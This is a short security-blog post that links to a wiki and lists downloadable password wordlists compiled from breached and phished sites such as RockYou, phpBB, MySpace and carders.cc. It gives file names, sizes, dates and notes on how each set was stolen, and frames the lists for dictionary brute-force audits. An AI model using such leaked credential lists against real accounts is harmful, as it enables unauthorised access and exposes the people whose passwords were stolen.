Mega Passwords list collection For your Dictionary brute force audit

lists including latest hacked sites passwords list like rockyou.com linkedin etc

all in this wiki :

http://www.skullsecurity.org/wiki/index.php/Passwords

Name	Compressed	Uncompressed	Date	Notes
Rockyou	rockyou.txt.bz2 (60,498,886 bytes)	n/a	2009-12	Best list available; huge, stolen unencrypted
Rockyou with count	rockyou-withcount.txt.bz2 (59,500,255 bytes)	n/a	2009-12	Best list available; huge, stolen unencrypted
phpbb	phpbb.txt.bz2 (868,606 bytes)	n/a	2009-01	Ordered by commonness Cracked from md5 by Brandon Enright (97%+ coverage)
phpbb with count	phpbb-withcount.txt.bz2 (872,867 bytes)	n/a
phpbb with md5	phpbb-withmd5.txt.bz2 (4,117,887 bytes)	n/a
MySpace	myspace.txt.bz2 (175,970 bytes)	n/a	2006-10	Captured via phishing
MySpace - with count	myspace-withcount.txt.bz2 (179,929 bytes)	n/a	2006-10	Captured via phishing
Hotmail	hotmail.txt.bz2 (47,195 bytes)	n/a	Unknown	Isn't clearly understood how these were stolen
Hotmail with count	hotmail-withcount.txt.bz2 (47,975 bytes)	n/a	Unknown	Isn't clearly understood how these were stolen
Faithwriters	faithwriters.txt.bz2 (39,327 bytes)	n/a	2009-03	Religious passwords
Faithwriters - with count	faithwriters-withcount.txt.bz2 (40,233 bytes)	n/a	2009-03	Religious passwords
Elitehacker	elitehacker.txt.bz2 (3,690 bytes)	n/a	2009-07	Part of zf05.txt
Elitehacker - with count	elitehacker-withcount.txt.bz2 (3,846 bytes)	n/a	2009-07	Part of zf05.txt
Hak5	hak5.txt.bz2 (16,490 bytes)	n/a	2009-07	Part of zf05.txt
Hak5 - with count	hak5-withcount.txt.bz2 (16,947 bytes)	n/a	2009-07	Part of zf05.txt
Älypää	alypaa.txt.bz2 (5,178 bytes)	n/a	2010-03	Finnish passwords
alypaa - with count	alypaa-withcount.txt.bz2 (6,013 bytes)	n/a	2010-03	Finnish passwords
Facebook (Pastebay)	facebook-pastebay.txt.bz2 (375 bytes)	n/a	2010-04	Found on Pastebay; appear to be malware-stolen.
Facebook (Pastebay) - w/ count	facebook-pastebay-withcount.txt.bz2 (407 bytes)	n/a	2010-04	Found on Pastebay; appear to be malware-stolen.
Unknown porn site	porn-unknown.txt.bz2 (30,600 bytes)	n/a	2010-08	Found on angelfire.com. No clue where they originated, but clearly porn site.
Unknown porn site - w/ count	porn-unknown-withcount.txt.bz2 (31,899 bytes)	n/a	2010-08
Ultimate Strip Club List	tuscl.txt.bz2 (176,291 bytes)	n/a	2010-09	Thanks to Mark Baggett for finding!
Ultimate Strip Club List - w/ count	tuscl-withcount.txt.bz2 (182,441 bytes)	n/a	2010-09	Thanks to Mark Baggett for finding!
[Facebook Phished]	facebook-phished.txt.bz2 (14,457 bytes)	n/a	2010-09	Thanks to Andrew Orr for reporting
Facebook Phished - w/ count	facebook-phished-withcount.txt.bz2 (14,941 bytes)	n/a	2010-09	Thanks to Andrew Orr for reporting
Carders.cc	carders.cc.txt.bz2 (8,936 bytes)	n/a	2010-05
Carders.cc - w/ count	carders.cc-withcount.txt.bz2 (9,774 bytes)	n/a	2010-05
Singles.org	singles.org.txt.bz2 (50,697 bytes)	n/a	2010-10
Singles.org - w/ count	singles.org-withcount.txt.bz2 (52,884 bytes)	n/a	2010-10
Unnamed financial site	(reserved)	(reserved)	2010-12
Unnamed financial site - w/ count	(reserved)	(reserved)	2010-12
Gawker	(reserved)	(reserved)	2010-12
Gawker - w/ count	(reserved)	(reserved)	2010-12
Free-Hack.com	(reserved)	(reserved)	2010-12
Free-Hack.com w/count	(reserved)	(reserved)	2010-12
Carders.cc (second time hacked)	(reserved)	(reserved)	2010-12
Carders.cc w/count (second time hacked)	(reserved		2010-12

SEC-SEE

Latest Security News